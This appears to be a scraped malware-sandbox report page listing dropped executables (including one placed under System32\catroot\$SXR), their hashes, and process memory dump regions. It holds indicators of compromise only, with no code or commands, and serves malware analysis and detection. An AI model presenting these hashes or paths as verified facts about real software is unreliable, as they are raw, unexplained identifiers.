9d1de488e44e347c7816b7a568401564f1e80c0aadf679d6bac22413c9e4d0efedce0e565a27cc80e95858abdbd84923c062144783cb3dd9bb1a11dd2ac2e959

Download Submit
\Users\Admin\AppData\Local\Temp\switched.exe

Filesize
3.7MB

MD5
b9bbe31d276de5c3d05352d070ae4244

SHA1
5e1bb67b01c579b4e0ad5a7475ceb657201c27ec

SHA256
a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d

SHA512
0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17

Download Submit
\Users\Admin\AppData\Local\Temp\tesetey.exe

Filesize
494KB

MD5
0f0838bc6642dd6bc603368e50b4aba3

SHA1
932bd4d1c11996bf8ac3ac74a94b266e96d44c36

SHA256
4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9

SHA512
a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

Download Submit
\Windows\System32\catroot\$SXR\$SXR.exe

Filesize
7.8MB

MD5
a9696c84d1bc8731fda72d5073f0cfe3

SHA1
c364c3a16ee68efb9b9a91e6ed51cd0bdf9af45a

SHA256
dd576bb7be7807a85506c5687a7a34726abbb16e5324dc614210ec3abb1ff14b

SHA512
956709deead60d1517f23de733822c359b646155f7d32e0750414c0e6160096793c1020b9d1fb6b7775208cd0b112ccb03128a5d1c4c4b354bbd7860063c0ddf

Download Submit
memory/916-106-0x0000000074770000-0x0000000074E5E000-memory.dmp

Filesize
6.9MB

Download
memory/916-105-0x0000000000CA0000-0x00000000012E0000-memory.dmp

Filesize
6.2MB

Download
memory/916-107-0x00000000048E0000-0x0000000004920000-memory.dmp

Filesize
256KB

Download
memory/916-131-0x0000000074770000-0x0000000074E5E000-memory.dmp

Filesize
6.9MB

Download
memory/916-132-0x00000000048E0000-0x0000000004920000-memory.dmp

Filesize
256KB

Download
memory/1800-101-0x0000000004290000-0x0000000004291000-memory.dmp

Filesize
4KB

Download
memory/1800-130-0x0000000004290000-0x0000000004291000-memory.dmp

Filesize
4KB

Download
memory/1816-21-0x00000000031D0000-0x000000000360C000-memory.dmp

Filesize
4.2MB

Download
memory/1940-50-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1940-52-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1940-63-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1940-57-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1940-73-0x0000000004A90000-0x0000000004AD0000-memory.dmp

Filesize
256KB

Download
memory/1940-55-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1940-54-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/1940-127-0x0000000004A90000-0x0000000004AD0000-memory.dmp

Filesize
256KB

Download
memory/1940-128-0x0000000074770000-0x0000000074E5E000-memory.dmp

Filesize
6.9MB

Download
memory/1940-83-0x0000000074770000-0x0000000074E5E000-memory.dmp

Filesize
6.9MB

Download
memory/1940-48-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1940-46-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2104-40-0x00000000007D0000-0x0000000000810000-memory.dmp

Filesize
256KB

Download
memory/2104-96-0x0000000074770000-0x0000000074E5E000-memory.dmp

Filesize
6.9MB

Download
memory/2104-15-0x0000000074770000-0x0000000074E5E000-memory.dmp

Filesize
6.9MB

Download
memory/2104-14-0x0000000000820000-0x0000000000E60000-memory.dmp

Filesize
6.2MB

Download
memory/2296-99-0x000000006EE80000-0x000000006F42B000-memory.dmp

Filesize
5.7MB

Download
memory/2296-80-0x000000006EE80000-0x000000006F42B000-memory.dmp

Filesize
5.7MB

Download
memory/2296-77-0x000000006EE80000-0x000000006F42B000-memory.dmp

Filesize
5.7MB

Download
memory/2296-78-0x00000000029C0000-0x0000000002A00000-memory.dmp

Filesize
256KB

Download
memory/2664-23-0x000000013FDB0000-0x00000001401EC000-memory.dmp

Filesize
4.2MB

Download
memory/2664-100-0x000000013FDB0000-0x00000001401EC000-memory.dmp

Filesize
4.2MB

Download
memory/2812-126-0x000007FEF5AD0000-0x000007FEF64BC000-memory.dmp

Filesize
9.9MB

Download
memory/2812-86-0x000000001AEC0000-0x000000001AF40000-memory.dmp

Filesize
512KB

Download
memory/2812-72-0x000007FEF5AD0000-0x000007FEF64BC000-memory.dmp

Filesize
9.9MB

Download
memory/2812-129-0x000000001AEC0000-0x000000001AF40000-memory.dmp

Filesize
512KB

Download
memory/2812-64-0x0000000001090000-0x0000000001098000-memory.dmp

Filesize
32KB

Download
memory/2836-32-0x0000000004BC0000-0x0000000004C00000-memory.dmp

Filesize
256KB

Download
memory/2836-31-0x0000000074770000-0x0000000074E5E000-memory.dmp

Filesize
6.9MB

Download
memory/2836-29-0x0000000000ED0000-0x0000000000F52000-memory.dmp

Filesize
520KB

Download
memory/2836-74-0x0000000074770000-0x0000000074E5E000-memory.dmp

Filesize
6.9MB

Download
memory/2968-76-0x000000006EE80000-0x000000006F42B000-memory.dmp

Filesize
5.7MB

Download
memory/2968-98-0x000000006EE80000-0x000000006F42B000-memory.dmp

Filesize
5.7MB

Download
memory/2968-81-0x000000006EE80000-0x000000006F42B000-memory.dmp

Filesize
5.7MB

Download
memory/2968-79-0x0000000002E10000-0x0000000002E50000-memory.dmp

Filesize
256KB

Download
memory/2968-82-0x0000000002E10000-0x0000000002E50000-memory.dmp

Filesize
256KB

Download